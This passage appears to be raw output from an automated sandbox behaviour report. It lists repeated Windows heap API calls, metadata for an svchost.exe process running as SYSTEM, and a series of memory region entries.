[0371.910] GetProcessHeap () returned 0x60000
[0371.910] GetProcessHeap () returned 0x60000
[0371.910] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x95f70) returned 1
[0371.910] GetProcessHeap () returned 0x60000
[0371.910] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x95f70) returned 0x5a
[0371.911] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x95f70 | out: hHeap=0x60000) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75970) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75970) returned 0x20
[0371.911] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75970 | out: hHeap=0x60000) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] GetProcessHeap () returned 0x60000
[0371.912] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x759a0) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x759a0) returned 0x20
[0371.912] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x759a0 | out: hHeap=0x60000) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x759d0) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x759d0) returned 0x20
[0371.913] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x759d0 | out: hHeap=0x60000) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a00) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a00) returned 0x20
[0371.913] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a00 | out: hHeap=0x60000) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbb0) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cbb0) returned 0x20
[0371.914] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbb0 | out: hHeap=0x60000) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbe0) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cbe0) returned 0x20
[0371.915] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbe0 | out: hHeap=0x60000) returned 1
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x77bd0) returned 1
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x77bd0) returned 0x30
[0371.915] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x77bd0 | out: hHeap=0x60000) returned 1
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc10) returned 1
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc10) returned 0x20
[0371.917] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc10 | out: hHeap=0x60000) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x77c10) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x77c10) returned 0x30
[0371.917] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x77c10 | out: hHeap=0x60000) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc70) returned 0x20
[0371.918] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70 | out: hHeap=0x60000) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x81210) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x81210) returned 0xe
[0371.918] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x81210 | out: hHeap=0x60000) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x93810) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x93810) returned 0x20
[0371.919] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x93810 | out: hHeap=0x60000) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba10) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba10) returned 0x18
[0371.919] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba10 | out: hHeap=0x60000) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a30) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a30) returned 0x20
[0371.920] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a30 | out: hHeap=0x60000) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a60) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.921] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a60) returned 0x20
[0371.921] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a60 | out: hHeap=0x60000) returned 1
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a90) returned 1
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a90) returned 0x20
[0371.921] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a90 | out: hHeap=0x60000) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75ac0) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75ac0) returned 0x20
[0371.922] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75ac0 | out: hHeap=0x60000) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba30) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba30) returned 0x18
[0371.923] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba30 | out: hHeap=0x60000) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75af0) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75af0) returned 0x20
[0371.923] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75af0 | out: hHeap=0x60000) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] GetProcessHeap () returned 0x60000
[0371.924] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b80) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b80) returned 0x20
[0371.924] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b80 | out: hHeap=0x60000) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c40) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c40) returned 0x20
[0371.925] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c40 | out: hHeap=0x60000) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c70) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c70) returned 0x20
[0371.925] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c70 | out: hHeap=0x60000) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7caf0) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7caf0) returned 0x20
[0371.926] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7caf0 | out: hHeap=0x60000) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb20) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb20) returned 0x20
[0371.927] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb20 | out: hHeap=0x60000) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb50) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb50) returned 0x20
[0371.927] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb50 | out: hHeap=0x60000) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba50) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba50) returned 0x18
[0371.928] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba50 | out: hHeap=0x60000) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75bb0) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75bb0) returned 0x20
[0371.929] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75bb0 | out: hHeap=0x60000) returned 1
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9d0) returned 1
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9d0) returned 0x18
[0371.929] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9d0 | out: hHeap=0x60000) returned 1
[0371.929] exit (_Code=1)
Thread:
id = 82
os_tid = 0x51c
Process:
id = "5"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x71b4000"
os_pid = "0x36c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "3"
os_parent_pid = "0x1d8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000da1c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1213
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1214
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1215
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1216
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1217
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1218
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1219
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1220
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1221
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1222
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1223
start_va = 0x200000
end_va = 0x200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 1224
start_va = 0x210000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1225
start_va = 0x290000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 1226
start_va = 0x350000
end_va = 0x35afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 1227
start_va = 0x360000
end_va = 0x36cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1228
start_va = 0x370000
end_va = 0x373fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 1229
start_va = 0x380000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 1230
start_va = 0x480000
end_va = 0x607fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1231
start_va = 0x610000
end_va = 0x619fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 1232
start_va = 0x620000
end_va = 0x620fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1233
start_va = 0x630000
end_va = 0x631fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 1234
start_va = 0x640000
end_va = 0x643fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1235
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1236
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 1237
start_va = 0x7f0000
end_va = 0x7f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 1238
start_va = 0x800000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 1239
start_va = 0x830000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 1240
start_va = 0x930000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 1241
start_va = 0x9b0000
end_va = 0x9b3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1242
start_va = 0x9c0000
end_va = 0x9cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 1243
start_va = 0x9d0000
end_va = 0x9d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 1244
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009e0000"
filename = ""
Region:
id = 1245
start_va = 0xa70000
end_va = 0xa8bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 1246
start_va = 0xa90000
end_va = 0xa90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1247
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000aa0000"
filename = ""
Region:
id = 1248
start_va = 0xab0000
end_va = 0xab0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wshtcpip.dll.mui"
filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui")
Region:
id = 1249
start_va = 0xb50000
end_va = 0xb53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1250
start_va = 0xb60000
end_va = 0xb79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b60000"
filename = ""
Region:
id = 1251
start_va = 0xb90000
end_va = 0xb97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 1252
start_va = 0xbc0000
end_va = 0xbc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wship6.dll.mui"
filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui")
Region:
id = 1253
start_va = 0xbd0000
end_va = 0xbd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000bd0000"
filename = ""
Region:
id = 1254
start_va = 0xc60000
end_va = 0xc60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c60000"
filename = ""
Region:
id = 1255
start_va = 0xc70000
end_va = 0xf3efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1256
start_va = 0x1010000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 1257
start_va = 0x1090000
end_va = 0x110ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1258
start_va = 0x1110000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 1259
start_va = 0x1160000
end_va = 0x11dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001160000"
filename = ""
Region:
id = 1260
start_va = 0x1230000
end_va = 0x12affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001230000"
filename = ""
Region:
id = 1261
start_va = 0x12c0000
end_va = 0x133ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012c0000"
filename = ""
Region:
id = 1262
start_va = 0x1340000
end_va = 0x13bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001340000"
filename = ""
Region:
id = 1263
start_va = 0x1440000
end_va = 0x14a5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1264
start_va = 0x1500000
end_va = 0x157ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 1265
start_va = 0x15e0000
end_va = 0x15effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015e0000"
filename = ""
Region:
id = 1266
start_va = 0x15f0000
end_va = 0x166ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015f0000"
filename = ""
Region:
id = 1267
start_va = 0x16a0000
end_va = 0x171ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 1268
start_va = 0x1740000
end_va = 0x1742fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 1269
start_va = 0x1750000
end_va = 0x17cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 1270
start_va = 0x17d0000
end_va = 0x184ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 1271
start_va = 0x1860000
end_va = 0x18dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001860000"
filename = ""
Region:
id = 1272
start_va = 0x18e0000
end_va = 0x18e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000018e0000"
filename = ""
Region:
id = 1273
start_va = 0x1930000
end_va = 0x19affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001930000"
filename = ""
Region:
id = 1274
start_va = 0x19d0000
end_va = 0x1a4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019d0000"
filename = ""
Region:
id = 1275
start_va = 0x1a60000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a60000"
filename = ""
Region:
id = 1276
start_va = 0x1ae0000
end_va = 0x1bdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1277
start_va = 0x1be0000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001be0000"
filename = ""
Region:
id = 1278
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 1279
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 1280
start_va = 0x1f00000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1281
start_va = 0x2030000
end_va = 0x20affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 1282
start_va = 0x2170000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002170000"
filename = ""
Region:
id = 1283
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 1284
start_va = 0x2390000
end_va = 0x240ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 1285
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
